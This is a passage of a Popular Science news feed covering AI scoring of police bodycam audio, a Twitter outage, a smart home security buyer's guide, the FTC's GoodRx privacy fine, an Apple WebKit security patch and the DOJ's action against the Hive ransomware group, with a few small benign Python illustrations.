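# Truleo's site lists ("formality", "directed profanity", "threat").
# Real NLP classifiers learn these patterns from labeled data; this
# keyword-rule version only shows the general shape of the task.

RULES = {
    "threat": ["i will break", "i'll hurt"],
    "formality": ["may i please", "sir", "ma'am"],
    "request": ["license and registration"],
}

def classify(line: str) -> list[str]:
    """Return every category whose trigger phrases appear in the line."""
    text = line.lower()
    return [label for label, phrases in RULES.items()
            if any(phrase in text for phrase in phrases)]

print(classify("May I please see your license and registration?"))
print(classify("If you move from here I will break your legs"))
```

Even this toy version shows why critics worry about edge cases: a line matching no rule, or matching the wrong one, silently shapes how an officer's interaction gets scored.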

Professionalism vs. Risk. Credit: Truleo

When asked about civilians’ rights to opt-out of this new form of employee development, however, Tassone cautions he would only be “speculating or guessing” regarding their options.

“I mean, I’m not a lawyer,” stresses Tassone when asked about civilians’ rights regarding opt-outs. “These questions are more for district attorneys, maybe police union attorneys. Once this information is captured on body camera data, you’re asking the question of really, ‘Who does it belong to?’”  

“Can civilians call [local departments] and ask to be removed? I don’t know,” he adds.

PopSci reached out to Alameda and Aurora law enforcement representatives for comment, and will update this post accordingly.

[Related: The DOJ is investigating an AI tool that could be hurting families in Pennsylvania.]

Michael Zimmer, associate professor and vice-chair of Marquette University’s Department of Computer Science, as well as director of the Center for Data, Ethics, and Society, urged caution about the tech in an email to PopSci.

“While I recognize the good intentions of this application of AI to bodycam footage… I fear this could be fraught with bias in how such algorithms have been modeled and trained,” he says.

Zimmer questions exactly how “good” versus “problematic” interactions are defined, as well as who defines them. Given the prevalence of stressful, if not confrontational, civilian interactions with police, Zimmer takes issue with AI determining problematic officer behavior “based solely on bodycam audio interactions,” calling it “yet another case of the normalization of ubiquitous surveillance.”

Truleo’s website states any analyzed audio is first isolated from uploaded body cam footage through an end-to-end encrypted Criminal Justice Information Services (CJIS) compliant data transfer process. Established by the FBI in 1992, CJIS compliance guidelines are meant to ensure governmental law enforcement agencies and vendors like Truleo protect individuals’ civil liberties, such as those concerning privacy and safety, while storing and processing their digital data. It’s important to note, however, that “compliance” is not a “certification”: CJIS compliance is assessed solely by a company like Truleo alongside its law enforcement agency clients, with no centralized authorization entity to award any kind of legally binding certification.

Promotional material on Truleo’s website. Credit: Truleo

Regardless, Tassone explains the very nature of Truleo’s product bars its employees from ever accessing confidential information. “After we process [bodycam] audio, there is no derivative of data. No court can compel us to give anything, because we don’t keep anything,” says Tassone. “It’s digital exhaust—it’s ‘computer memory,’ and it’s gone.”

Truleo’s technology also only analyzes bodycam data it is voluntarily offered; what is processed remains the sole discretion of police chiefs, sergeants, and other Truleo customers. But as Axios notes, the vast majority of body cam footage goes unreviewed unless there’s a civilian complaint or external public pressure, as was the case in the death of Tyre Nichols. Even then, footage can remain difficult to acquire—see the years-long struggle surrounding Joseph Pettaway’s death in Montgomery, Alabama.

[Related: Just because an AI can hold a conversation does not make it smart.]

Meanwhile, it remains unclear what, if any, recourse is available to civilians uncomfortable at the thought of their interactions with authorities being transcribed for AI textual analysis. Tassone tells PopSci he has no problem if a handful of people request their data be excluded from local departments’ projects, as it likely won’t affect Truleo’s “overall anonymous aggregate scores.”

“We’re looking at thousands of interactions of an officer over a one year period of time,” he offers as an average request. “So if one civilian [doesn’t] want their data analyzed to decide whether or not they were compliant, or whether they were upset or not,” he pauses. “Again, it really comes down to: The AI says, ‘Was this civilian complaint during the call?’ ‘Yes’ or ‘No.’ ‘Was this civilian upset?’ ‘Yes’ or ‘No.’ That’s it.”



Twitter announced some new features, then temporarily crashed https://www.popsci.com/technology/twitter-blue-features-crash/ Thu, 09 Feb 2023 16:00:00 +0000 https://www.popsci.com/?p=510983
Close up of twitter icon
Twitter Blue now has 4,000-character tweets and fewer ads. Deposit Photos

Twitter Blue subscribers can now post 4,000 character tweets and see fewer ads—but the news was quickly overshadowed by tech woes.

The post Twitter announced some new features, then temporarily crashed appeared first on Popular Science.


Twitter announced the latest phase in its ongoing attempt to sell users on a premium subscription tier: 4,000-character tweets and half the ads. But news of the impending Twitter Blue perks was quickly buried in many users’ timelines, as some of the social media platform’s basic functions collapsed for roughly an hour and a half.

Beginning around 4:30PM EST, many users reported encountering an error message telling them they were “over the daily limit for sending Tweets.” Meanwhile, others reported being unable to send direct messages, retweet other accounts, or access the TweetDeck platform. “Sorry for the trouble,” the Twitter Support account tweeted roughly an hour into the problems, adding that it was “aware and working to get this fixed.” Most, if not all, functionality has since been restored, according to multiple outlets and the outage tracker DownDetector.

[Related: Twitter’s latest bad idea will kill vital research and fun bot accounts.]

For Twitter Blue subscribers in the US, that means they should be able to begin taking advantage of the additional real estate with tweets of up to 4,000 characters. For the time being, however, it doesn’t appear you can save those lengthier thoughts to your drafts or schedule them for delayed posting. Twitter’s announcement also made clear that, while the feature is paywalled behind Blue’s $8-per-month fee, anyone can read, retweet, and reply to the longer posts once they’re live.

Thankfully, the mini-blog option will remain visibly capped at the standard 280-character limit, with a button to expand the tweet into its lengthier final form. As TechCrunch notes, however, the impending blend of 4,000-character posts and tweet “threads” could easily muddy users’ timelines more than they already are. Blue’s additional promise of a 50-percent reduction in advertiser tweets might alleviate that issue, although even $8 a month may feel too steep for people used to what has always been a completely free service.

[Related: Meta sues data-scraping firm for selling user data to LAPD.]

Last week, Twitter CEO Elon Musk announced that the platform would begin paywalling access to its application program interface (API), supposedly beginning today. The decision was widely met with criticism from users, who argued it would likely kill the robust ecosystem of entertaining and informative bot accounts, alongside hobbling many researchers’ projects. As The Verge reports, the Twitter Dev account announced the API free tier would remain live until at least February 13, after which time users would be limited to generating “up to 1,500 Tweets per month.” A $100 per month tier for basic access would also soon follow, offering “low level of API usage and access to the Ads API.”

Security experts and everyday Twitter users alike have struggled with the platform’s dizzying changes and challenges following Musk’s acquisition of the company in October 2022 and his subsequent axing of over half its global staff of engineers and developers.



The best smart home security systems of 2023 https://www.popsci.com/gear/best-smart-home-security-systems/ Thu, 02 Feb 2023 18:00:00 +0000 https://www.popsci.com/?p=509217
A lineup of the best smart home security systems on a white background.
Amanda Reed

How smart is a home that doesn’t feel secure? Here’s how to feel safer in 2023 with the help of intelligent protective tech.

The post The best smart home security systems of 2023 appeared first on Popular Science.


We may earn revenue from the products available on this page and participate in affiliate programs. Learn more ›

Best overall: SimpliSafe 10-Piece Wireless Home Security System

Comes with everything you need for security inside and outside your home.

Best customer service: Ring Alarm Pro, 14-Piece

Talk to a real person and get your questions answered fast.

Best budget: Tolviviov Wi-Fi Door Alarm System

Easy to use for people of all technical skill levels.

If you’re worried about crime impacting your household, it makes perfect sense to buy one of the many smart home security systems that have popped up over the past few years. However, with abundance comes analysis paralysis. To what system should the savvy, safety-conscious consumer turn? We investigated the market to bring you the best smart home security systems so you can pick the best choice for your living situation and loved ones.

How we chose the best smart home security systems

While nearly every product you buy enters your home at some point, there is something particularly intimate about inviting in a smart home security system. Unlike shoes—something that only needs to function well enough when called upon—your smart home security system needs to function perfectly 24/7/365. That’s why one of the bigger ranking factors this time was brand satisfaction. Cybersecurity and data protection were other key factors because, while less is often more, in the world of security more really is more. You’re only as strong as your weakest entry point.

This guide was compiled after many hours of careful research; facts and opinions were cross-examined by editors. Ordinary users were asked about their experiences using these devices, and we interacted with customer service agents throughout the course of compiling this guide. Each company’s personal website and plan information were thoroughly checked for the most up-to-date service plan information possible.

The best smart home security systems: Reviews & Recommendations

Our selection of smart home security systems comes from a wide variety of well-known and trusted brands with a broad array of attached services. While kits differ, they all typically include sensors for your doors and/or windows and an alerting mechanism. One of our picks is sure to match your budget and lifestyle.

Best overall: SimpliSafe 10-Piece Wireless Home Security System


Why it made the cut: The SimpliSafe 10-Piece system is a very complete kit that starts the security before your door is opened.

Specs

  • Installation difficulty: Easy
  • Sensors: 4 door/window sensors, 2 motion sensors, 1 indoor camera, 1 outdoor camera
  • 24/7 professional monitoring: $28/mo. (Optional)
  • Smart protocols: N/A, but Alexa- and Nest-compatible

Pros

  • Outdoor cam so your security starts before an intruder enters your home
  • Comes with one free month of 24/7 professional monitoring service
  • The variety of parts gives you a more complete sense of security
  • Optics and branding

Cons

  • Must learn to set up each part correctly

If you’re looking for a system that is essentially complete directly out of the box, the SimpliSafe 10-Piece Wireless Home Security System is the kit for you. It includes a variety of sensors and indoor and outdoor cameras, meaning you should feel fully protected in your home. While each piece is easy to install in and of itself, you’ll have to learn and think about the placement of each part—however, you’ll be able to handle it on your own if you can handle a strip of 3M tape or a screwdriver. Let’s review each part individually to get a good picture of how they will function together in your home:

The SimpliSafe base can hold up to 100 SimpliSafe security devices and is the central hub for your equipment. It is also capable of emitting a 95dB alarm. The push-button keypad lets you arm and disarm the system with a PIN. Having four entry point door/window sensors will allow you to protect the primary entryways to your home, while the two motion sensors—which are designed to be pet friendly and decorative—protect the areas of your home with too many entry points or windows.

What makes the SimpliSafe 10-piece system better than the 12-piece version is the inclusion of both an indoor and an outdoor camera. If you’re used to the grainy, near-worthless security cam footage often seen in local news coverage, you’ll be particularly happy with the full-color, 1080p, night-vision footage SimpliSafe offers. For those concerned with privacy, the indoor camera comes with a stainless steel shutter, so you won’t have to worry about your private moments entering someone’s data tables.

Finally, the package set comes with an official SimpliSafe flag that declares your home protected by SimpliSafe. While no one can guarantee that this will deter all criminals, there will be at least a few that will back down.

Best customer service: Ring Alarm Pro, 14-Piece


Why it made the cut: Go from dialing a number to “Hello” in 1 minute, 18 seconds.

Specs

  • Installation difficulty: Easy
  • Sensors: 8 door/window sensors, 2 motion sensors
  • 24/7 professional monitoring: Between $4-$20/mo. (Optional)
  • Smart protocols: Z-wave

Pros

  • Fantastic phone technical support
  • Dual keypads for increased flexibility
  • Provides range extender for large homes
  • Multiple 24/7 monitoring plans to choose from

Cons

  • Overhyped WiFi functionality

The Ring Alarm Pro 14-Piece set has fantastic customer service and is a great smart home security system for larger homes. Its impressive networking and dual-keypad design (some home security systems only allow for one keypad) allow for larger coverage areas than many competing systems. With customizable ringtones, you’ll always know which door is being opened in your home. The Ring Alarm Pro even comes with Wi-Fi 6 functionality via its hub. This feature is handy but gets a bit overhyped, sometimes eclipsing what counts—there are better Wi-Fi 6 routers out there.

What should you get excited about with the Ring Alarm Pro? A very approachable DIY setup with a real human there to help you quickly. After just a few button taps to specify exactly what we wanted, we reached a customer service agent 1 minute and 18 seconds after dialing Ring’s customer service line.

Best monitoring: ADT 8-Piece Wireless Home Security System


Why it made the cut: ADT is amongst the most experienced and best professional monitoring companies.

Specs

  • Installation difficulty: Intermediate
  • Sensors: 4 door/window sensors, 1 motion detector 
  • 24/7 professional monitoring: $19.99/mo. (Optional)
  • Smart protocols: Z-wave

Pros

  • Highly experienced monitoring team
  • Perfect size for families
  • Optics and branding

Cons

  • Occasional installation snags
  • Only works in the U.S.

The ADT 8-Piece Wireless Home Security System is all you need to get started with the highly regarded ADT security model. It’s a brand that takes itself seriously, providing a yard sign to let customers proudly display their security status on the lawn. Sure, it is part marketing, but it’s also part confidence in the ADT name alone being able to ward off potential neighborhood thieves.

The package itself includes door/window sensors and a motion sensor, with the kit being targeted to owners of two- or three-bedroom homes. While not difficult, installing the sensors can take some time as you manually pair and label each one within your system. You can install them using the included adhesive backing or a more traditional screw-in technique. The time investment should feel closer to “weekend project” than “plug’n’play” for the typical first-time user.

When combined with the optional professional monitoring from ADT, it can almost feel as if you have a dedicated housesitter while you’re away.

Best modular: Wyze Home Security Core Kit


Why it made the cut: Wyze’s Home Security Core Kit is just that, a quality core kit that can be easily added to as needed.

Specs

  • Installation difficulty: Easy
  • Sensors: 2 door/window sensors, 1 motion sensor
  • 24/7 professional monitoring: $9.99/mo
  • Smart protocols: N/A

Pros

  • Very affordable and complete starter kit
  • Comes with three months of free professional monitoring
  • Can easily add on more sensors or cameras
  • Guided setup via Wyze app

Cons

  • Service plan essential
  • Only works in U.S.

If you prefer to wade through new technology instead of diving directly into the deep end, the Wyze Home Security Core Kit will be the best smart home security system for you. For starters, the core kit itself is very affordable, covers two entry points plus a room of your choice, and provides months of complimentary professional monitoring service to give you a taste of how Wyze works.

Once you’ve decided how much you like the system, you can start adding more components immediately. Finish off the rest of your home’s entry points with more door/window sensors, or transform your setup into a video surveillance system by adding a Wyze cam. Leak and home climate sensors are also available.

The modularity, as well as the stick-on setup guided by the Wyze app, gives the Wyze Home Security Core Kit a very DIY air. You can be confident that you, by yourself, should be able to install it. Unfortunately, the rugged individualism this inspires drops down a notch: the system really needs a 24/7 monitoring subscription to shine. The sensors will keep working after the three-month free trial runs out, but the keypad won’t, and the Wyze Cam add-on will lose smart features and extended storage. Still, the service is cheaper than market averages, and you probably wanted it anyway.

Most compatible: Abode Security System Starter Kit


Why it made the cut: Abode goes way beyond just Z-wave and Zigbee.

Specs

  • Installation difficulty: Easy
  • Sensors: 1 door/window sensor, 1 motion sensor
  • 24/7 professional monitoring: Between $7-$22/mo. (Semi-optional)
  • Smart protocols: Zigbee, Z-wave, Homekit, IFTTT

Pros

  • Connects and works with just about anything
  • Variable professional monitoring options
  • Sub-30-minute total setup time
  • Easily expandable

Cons

  • Limited sensors in starter kit
  • Reviews note poor customer service

Can’t decide between Zigbee and Z-wave, so want access to both? Not sure if you want to use Alexa or opt for a Google home security system? Need HomeKit or IFTTT support? It’s time to look at an Abode Security System, a home security system that connects with all of these in some way.

The Abode Security System Starter Kit is a perfect way to get set up with the system, as it includes the main hub, a couple of sensors, and a key fob. You’ll find it surprisingly easy to set up and get going—even technological turtles report installation times of under 30 minutes—but will quickly find yourself wanting other pieces if you don’t have, for example, home security cameras from an existing, compatible system. If you decide to stick with Abode products, you can choose from glass break sensors, water leak sensors, smoke alarms, and indoor/outdoor cameras to tailor the system to your needs.

While all owners have access to alerts and live video feeds, more “advanced” features—such as video storage—require you to subscribe to one of Abode’s plans, either the Standard (self-monitoring) or Pro (professional monitoring).

Best budget: Tolviviov Wi-Fi Door Alarm System


Why it made the cut: This is the best smart home security system under $100.

Specs

  • Installation difficulty: Easy
  • Sensors: 5 door/window sensors
  • 24/7 professional monitoring: No
  • Smart protocols: N/A

Pros

  • Simple to use system with keychain fob and app control
  • Very loud alarm
  • Affordable for all pricing
  • No monthly payments

Cons

  • Supported by 2.4GHz Wi-Fi network only
  • Lower brand recognition

If you want to avoid overly techy solutions and save money in the long run, the Tolviviov Wi-Fi Door Alarm System is worth checking out. Tolviviov systems, in addition to being budget-friendly, also happen to be among the best smart home security systems for elderly people thanks to their extremely loud alarms and manual keychain controls. The system still has app functionality, including Alexa support, for those wanting a more modern feel.

Considering the price range, it shouldn’t be surprising that the Tolviviov system doesn’t have a professional monitoring system. However, this lack comes with a silver lining, as systems with professional monitoring on a recurring monthly subscription often tie other features into it. With the Tolviviov, what you see is what you get. A loud siren to alert you to entries, app alerts that tell you what sensor was disturbed, and the option for Alexa voice support. It’s simple, but it works.

The main concerns for the Tolviviov system are its connectivity and brand recognition. The Tolviviov only works on the 2.4GHz Wi-Fi band, so be prepared to isolate that band if your router combines it with 5GHz under a single network name. And the brand recognition just isn’t there yet: sure, the super loud alarm will make burglars scram, but you won’t get the same response from the name “Tolviviov” that you will from an “ADT” sign in your yard or a Ring video doorbell near your front door.

What to consider when buying the best smart home security systems

From the surface, the best smart home security systems appear to be quite similar, just different collections of the same parts. This is compounded by the fact that, when things are running smoothly, our residential security systems blend into the background of our lives. However, if you do even a tiny amount of digging, you’ll see that there is more complexity in both the hardware and the included customer service plans than meets the eye.

Options for 24/7 professional monitoring

If you have a smart home security system that alerts you when intruders come into your home, or when your house faces other problems, you are all in the clear, right? While it is a nice thought, it is potentially untrue if you are incapacitated or unable to reach your phone to assess the threat (such as while out at work or on vacation).

Typically, 24/7 professional monitoring comes as part of a subscription, usually around $30 per month. Some systems retain most of their functionality without the subscription, while others provide only limited service without the full plan.

Zigbee and/or Z-Wave connection

Much like Wi-Fi, Zigbee and Z-Wave are wireless protocols that can connect the pieces of your smart home security system together. Zigbee networks typically respond faster but burn through batteries more quickly, while Z-Wave devices can show a bit of response delay but require less battery maintenance.

In reality, which of the two is better depends on your overall network. If you already own a lot of Z-Wave products, adding another Z-Wave device is great because certified Z-Wave devices are required to interoperate. Zigbee devices can usually “find” each other but don’t always interconnect in a fully functioning way, somewhat like pairing non-Apple headphones to your iPhone via Bluetooth.

Another possibility includes using neither system and operating solely through Wi-Fi and the system’s own proprietary hub. If you are looking for a smart home security system and not a full smart home network, this should be fine. Alternatively, super-compatible systems can connect to both networks and have other connection options as well. Whether you want to go with Zigbee or Z-Wave or both is entirely up to you.
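
If you want to sanity-check a new purchase against the gear you already own, the decision above boils down to counting which protocols dominate your current setup and preferring those. A toy sketch in Python (the device names and the simple “majority wins” heuristic are hypothetical, not from any vendor):

```python
# Hypothetical helper: given the protocols your existing smart home devices
# use, rank which radios a new security hub should support. Real products
# list their supported protocols on the spec sheet.
from collections import Counter

def recommend_radios(existing_devices: dict) -> list:
    """existing_devices maps device name -> protocol ('zigbee', 'z-wave', 'wifi')."""
    counts = Counter(existing_devices.values())
    # Prefer the protocols you already own the most of; Wi-Fi is the
    # fallback for an empty or brand-new setup.
    return [proto for proto, _ in counts.most_common()] or ["wifi"]

print(recommend_radios({"lock": "z-wave", "bulb": "zigbee", "plug": "z-wave"}))
# ['z-wave', 'zigbee']
```

A hub that supports the top-ranked protocol (plus Wi-Fi) will cover most of your existing devices without extra bridges.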

Branding and flags

Some smart home security systems include a flag or sign to stick in your lawn to scare off potential thieves. Some customers are happy to see it, while others worry a sign simply tells a determined burglar which system they’ll need to defeat.

What does the science say? Our friends at Bob Vila took a deep dive into the research on security signs and crime deterrence. Here are some of their findings:

  • ~25% of criminals will skip a home with a security sign.
  • ~50% of criminals will skip a home with a security sign and a visible camera.
  • The optimal locations for such signs are in a place visible from the street and in the backyard.
  • Branding matters. A recognizable or easily searched-for brand name works best to convince thieves your home is really protected.

Privacy

Whenever you bring something into your home, you want to feel comfortable about your privacy. This goes doubly so for home security products that can record and monitor the inside of your home. As such, you should pay particular attention to a brand’s privacy track record.

Take, for instance, the recent controversy over Anker’s eufy brand, which promised end-to-end encryption but didn’t deliver. If that wasn’t damaging enough, the company’s initial response was to merely change their privacy commitment statement. They’ve since come clean, but the sour taste still lingers.

For full transparency, eufy is not the only brand to have publicly suffered a privacy breach. In 2021, a former ADT technician pleaded guilty to charges of criminal spying while employed at the company. The important things to note here: ADT handled the situation far better than eufy did, its internal procedures and systems have since been changed to make a repeat less likely, and the incident involved a single employee rather than the company at large. (The ADT system in this guide does not include a camera.)

FAQs

Q: How much does a smart home security system cost?

A smart home security system can cost anywhere from under $80 to over $400. You should also leave room in your budget for a monitoring subscription, which typically costs between $20 and $40 per month. Overall, smart home security systems are quite affordable and shouldn’t outprice other smart gear for your home.
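
For budgeting purposes, total cost of ownership is simply the hardware price plus the subscription fee over however long you keep the system. A quick sketch with hypothetical mid-range figures pulled from the ranges above:

```python
def total_cost(hardware, monthly_fee, years):
    """Upfront hardware price plus the monitoring subscription over the ownership period."""
    return hardware + monthly_fee * 12 * years

# Hypothetical mid-range example: a $250 kit with a $30/month plan, kept for 3 years.
print(total_cost(250, 30, 3))  # 1330
```

As the example shows, the subscription quickly dwarfs the hardware price, so the monthly fee deserves more scrutiny than the sticker price.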

Q: What is the highest-rated home security system?

The highest-rated home security systems come from SimpliSafe and Ring. With new products and bundles being released regularly, as well as shifting prices, consumer ratings for individual bundles may fluctuate over time. That being said, highly regarded product bundles from both companies can receive a coveted 4.7 stars or higher on Amazon after hundreds (or even thousands) of reviews.

Q: Is smart home security worth it?

Smart home security is worth it if you are nervous about the safety of your home or neighborhood. Some systems can check for flooding and fires as well. With 24/7 professional monitoring, you also have access to a team that is ready to help you and alert authorities in case of an emergency. People wanting smaller, less extensive security should consider smart doorbells as a potential alternative.

Q: Is SimpliSafe better than Wyze?

It depends on what you want in a system. SimpliSafe is among the highest-rated smart home security systems, and the SimpliSafe 10-Piece Wireless Home Security System is our pick for the best smart home security system due to its high-quality performance and complete coverage. This isn’t to say that Wyze systems are bad; the Wyze Home Security Core Kit is a premium choice for those who want a custom, modular system.

Final thoughts on the best smart home security systems

Getting one of the best smart home security systems in 2023 is not as difficult as in years past. Installation should be smoother thanks to simple wireless Zigbee, Z-Wave, and Wi-Fi connections that integrate these systems with the smart home gadgets you already own. With app integration and voice support, you can get the truly convenient home security you desire.

The post The best smart home security systems of 2023 appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

GoodRx fined $1.5 million for allegedly selling users’ health data https://www.popsci.com/technology/ftc-goodrx-fine-facebook/ Thu, 02 Feb 2023 16:00:00 +0000 https://www.popsci.com/?p=509321
Close up of medicine jar tipped over with pills spread on glass table
The FTC alleges GoodRx's data misuse extended as far back as 2017. Deposit Photos

The company allegedly promised to keep users' medical info private, but instead sold it to third-party advertisers.

The post GoodRx fined $1.5 million for allegedly selling users’ health data appeared first on Popular Science.


GoodRx has helped millions of consumers find discounts on medical services, like prescription drug deals and affordable telehealth, since its debut in 2011. For years, the company’s official privacy policy stated it would share only limited personal data with third parties, and never users’ health information.

According to new Federal Trade Commission allegations, however, GoodRx lied to over 55 million users by surreptitiously selling deeply personal medical information to companies as large as Facebook and Google. The company only changed its policies after consumer advocacy groups uncovered the practice in 2020.

Per its enforcement action announced on Wednesday, the FTC claims GoodRx categorically mishandled users’ personal medical information, including users’ prescriptions and health conditions, as far back as 2017. Despite explicitly vowing it “would never share personal health information with advertisers or other third parties,” says the FTC, GoodRx instead sold this data to advertising companies and platforms including Google, Facebook, Branch, and Twilio to craft personalized ads.

[Related: How data brokers threaten your privacy.]

In August 2019, for example, the FTC detailed how GoodRx assembled lists of users who purchased specific medications, then uploaded their emails, phone numbers, and mobile ad IDs to Facebook. From there, the company matched them to account profiles and categorized them by the purchased meds, which they then targeted with personalized health-related advertisements.

The alleged deception also included previously displaying a seal supposedly certifying GoodRx’s compliance with the Health Insurance Portability and Accountability Act of 1996 (HIPAA). GoodRx also purportedly misled the public about its adherence to the principles of the Digital Advertising Alliance, which forbids participating companies from sharing health information for advertising without explicit consumer consent. The case also marks the FTC’s first enforcement action under the Health Breach Notification Rule, since GoodRx failed to notify the public about unauthorized disclosures of individually identifiable health information to third-party advertisers.

“The fact that GoodRx has been endangering its users and abusing their trust is disgusting,” Caitlin Seeley George, Campaign Director for the digital rights advocacy group, Fight for the Future, wrote to PopSci via email. Apart from the ethical issues, George also described the situation as “terrifying, especially at a time when people are scared of how their personal health information could be used to accuse them of breaking draconian anti-abortion or anti-trans laws.”

[Related: Hive ransomware extorted $100 million from victims. The DOJ just hit back.]

In a response released to the public, GoodRx representatives state, “We do not agree with the FTC’s allegations and we admit no wrongdoing” and claim that, “entering into the settlement allows us to avoid the time and expense of protracted litigation.” Representatives also claim, “the settlement with the FTC focuses on an old issue that was proactively addressed almost three years ago, before the FTC inquiry began.”

In a blog post published on GoodRx’s website, the company writes that it addressed the FTC’s privacy concerns in 2020, ahead of the agency’s investigation while also highlighting the ubiquity of data tracking strategies such as the controversial Facebook “pixel” tracking system.

The FTC’s proposed federal court order includes a $1.5 million civil penalty alongside a permanent ban on sharing user health information with third parties for advertising. Other stipulations include user consent for any future information sharing, an order directing third parties to permanently delete any data previously gathered through these methods, limited data-retention policies, and a mandated privacy program.

[Related: Chewy is doggedly trying to expand into pet telehealth.]

George contends that the comparatively meager fine for a company as large as GoodRx “will do nothing to make amends to the people whose privacy has been violated.” Instead, she reiterated her organization’s urging of lawmakers to pass comprehensive federal data privacy laws so that such violations are discouraged from happening again.

GoodRx’s official Privacy Policy was last updated in January, and currently includes disclaimers regarding its right to sell users’ information to third-party advertisers.

Why you should update your iPhone ASAP, even if it is ancient https://www.popsci.com/technology/iphone-webkit-vulnerability/ Mon, 30 Jan 2023 23:00:00 +0000 https://www.popsci.com/?p=508540
iphone screen lockpad
Passwordless logins are coming to Apple, Google, and Microsoft devices and services. Yura Fresh / Unsplash

Old and new versions of Apple devices have been subject to a major vulnerability still in the wild.

The post Why you should update your iPhone ASAP, even if it is ancient appeared first on Popular Science.


Over the past week, Apple has rolled out some important security updates, including updates to iOS 16, iOS 15, and even iOS 12, to protect iPhones from a major vulnerability that’s still in the wild. That extends to older iPhone models, too.

Although the iPhone 5s was released back in 2013 and discontinued in 2016, it still gets the occasional crucial software update from Apple. The newest software for these older devices, iOS 12.5.7, was released last week and patches a bug with the catchy name of CVE-2022-42856 in older iPhones and iPads, including the iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation). 

For the newer versions of iPhones, CVE-2022-42856 was squashed at the end of November as part of iOS 16.1.2. It was also dealt with on other devices with the release of iOS 15.7.2, iPadOS 15.7.2, tvOS 16.2, and macOS Ventura 13.1. Basically, if you’ve been tapping “Remind Me Tomorrow” on your Apple updates for a few weeks, now is the time to install them.

First spotted late last year by Clément Lecigne of Google’s Threat Analysis Group, CVE-2022-42856 is a bug in Apple’s browser engine, WebKit, that allows an attacker to create malicious web content that can execute code on iPhones, iPads, Macs, and even Apple TVs. While everyone is a little cagey about the specifics of the exploit so that more bad actors can’t figure it out, it has a “High” severity score. That’s on a scale that goes None, Low, Medium, High, and then Critical, based on both how much control these kinds of exploits give attackers and how easily and widely they can be implemented.
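
Severity labels like this typically follow the CVSS v3.x qualitative scale, which buckets a 0.0–10.0 base score into those five ratings. A minimal sketch of the standard mapping (the article doesn’t quote this CVE’s exact numeric score, so the example value below is purely illustrative):

```python
def cvss_severity(score: float) -> str:
    """Map a CVSS v3.x base score (0.0-10.0) onto its qualitative rating."""
    if not 0.0 <= score <= 10.0:
        raise ValueError("CVSS base scores run from 0.0 to 10.0")
    if score == 0.0:
        return "None"
    if score <= 3.9:
        return "Low"
    if score <= 6.9:
        return "Medium"
    if score <= 8.9:
        return "High"
    return "Critical"

print(cvss_severity(8.8))  # High
```

Any score from 7.0 through 8.9 lands in the “High” bucket, one step below “Critical.”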

Crucially, Apple said on January 23 that it has received reports that this issue is being “actively exploited.” In other words, there are hackers out there using it to target Apple devices—including older devices running iOS 12—so it’s best to update to stay safe.

As well as CVE-2022-42856, iOS 16.3, iPadOS 16.3, macOS Ventura 13.2, and watchOS 9.3, which were released last week, squash a long list of vulnerabilities. Among them are two more WebKit bugs that could allow attackers to execute malicious code, two macOS denial-of-service vulnerabilities, and two macOS kernel vulnerabilities that could be abused to reveal sensitive information, execute malicious code, or determine details about its memory structure—possibly allowing for further attacks. 

But these latest updates don’t just deal with bugs. After announcing the feature last year, Apple has added support for security keys to Apple IDs. Basically, when you log in to your Apple ID, instead of getting a two-factor authentication (2FA) code sent to your phone, which can be intercepted by hackers, you can use a hardware security key that connects to your Apple device over USB, Lightning, or NFC. It’s significantly more secure because an attacker would have to physically steal your security key and learn your password to gain access to your account.
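
The reason a hardware key also resists phishing, where a texted code doesn’t, is origin binding: during a FIDO/WebAuthn login, the key signs a server challenge together with the website origin the browser actually reports, so a lookalike domain produces a signature the real server rejects. A deliberately simplified Python illustration (an HMAC stands in for the key’s real public-key signature, and the domains and secret are made up):

```python
# Illustrative sketch, not Apple's implementation: why a FIDO security key
# resists phishing. The key signs the challenge together with the origin it
# sees, so a lookalike domain yields a signature the real server rejects.
import hashlib
import hmac

SECRET = b"key-stored-in-hardware"  # never leaves the security key

def key_sign(challenge: bytes, origin: str) -> bytes:
    # The signature binds the challenge to the origin making the request.
    return hmac.new(SECRET, challenge + origin.encode(), hashlib.sha256).digest()

def server_verify(challenge: bytes, signature: bytes) -> bool:
    expected = key_sign(challenge, "https://appleid.apple.com")
    return hmac.compare_digest(expected, signature)

challenge = b"random-server-nonce"
# Legitimate login: origins match, verification succeeds.
print(server_verify(challenge, key_sign(challenge, "https://appleid.apple.com")))  # True
# Phishing site: the key signs the attacker's origin, so the real server says no.
print(server_verify(challenge, key_sign(challenge, "https://appleid.apple.example")))  # False
```

A texted 2FA code has no such binding: whoever reads the code, including a phishing page, can replay it to the real site.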

To get started with hardware security keys, you need at least two FIDO-certified keys that are compatible with your Apple devices, just in case you lose one. Apple recommends the YubiKey 5C NFC or YubiKey 5Ci for most Mac and iPhone models, and the FEITIAN ePass K9 NFC USB-A for older Macs. You also need your devices updated to iOS 16.3 and macOS Ventura 13.2. Once you’re ready, you can connect your security keys to your account in the Password & Security section of the relevant Settings app.

Hive ransomware extorted $100 million from victims. The DOJ just hit back. https://www.popsci.com/technology/doj-hive-ransomware-lawsuit/ Fri, 27 Jan 2023 18:00:00 +0000 https://www.popsci.com/?p=508145
Black gloves typing on laptop keyboard in front of screen showing computer code
Authorities reportedly thwarted over $130 million in ransomware attacks. Deposit Photos

Hospitals and public school systems are among the 1,500 affected targets.

The post Hive ransomware extorted $100 million from victims. The DOJ just hit back. appeared first on Popular Science.


Federal officials on Thursday announced the results of a months-long infiltration campaign against Hive, a major international ransomware group whose numerous digital extortion schemes netted members over $100 million in payments. Since June 2021, Hive has subjected over 1,500 victims across 80 countries to attacks targeting critical infrastructure, healthcare, financial firms, and public school systems.

According to the Dept. of Justice filings, the FBI first gained access to Hive in July 2022, and soon amassed over 1,300 decryption keys they then provided to past and current victims, saving them an estimated $130 million in the process. Federal officials working with law enforcement organizations in Germany and the Netherlands have also succeeded in seizing and shutting down websites used by Hive members to communicate and coordinate attacks.

[Related: Hackers release data trove from police app.]

Ransomware campaigns function much as one might expect—users’ private and sensitive data is hacked and encrypted, then held indefinitely unless they pay the orchestrators. Often, this data still finds its way onto dark web marketplaces, as was the case with over 16,000 schoolchildren’s personal info in 2021.

Shuman Ghosemajumder, former Global Head of Product, Trust & Safety at Google, believes this week’s announcement is a positive development in countering ransomware gangs like Hive, while also highlighting just how advanced these organizations have become.

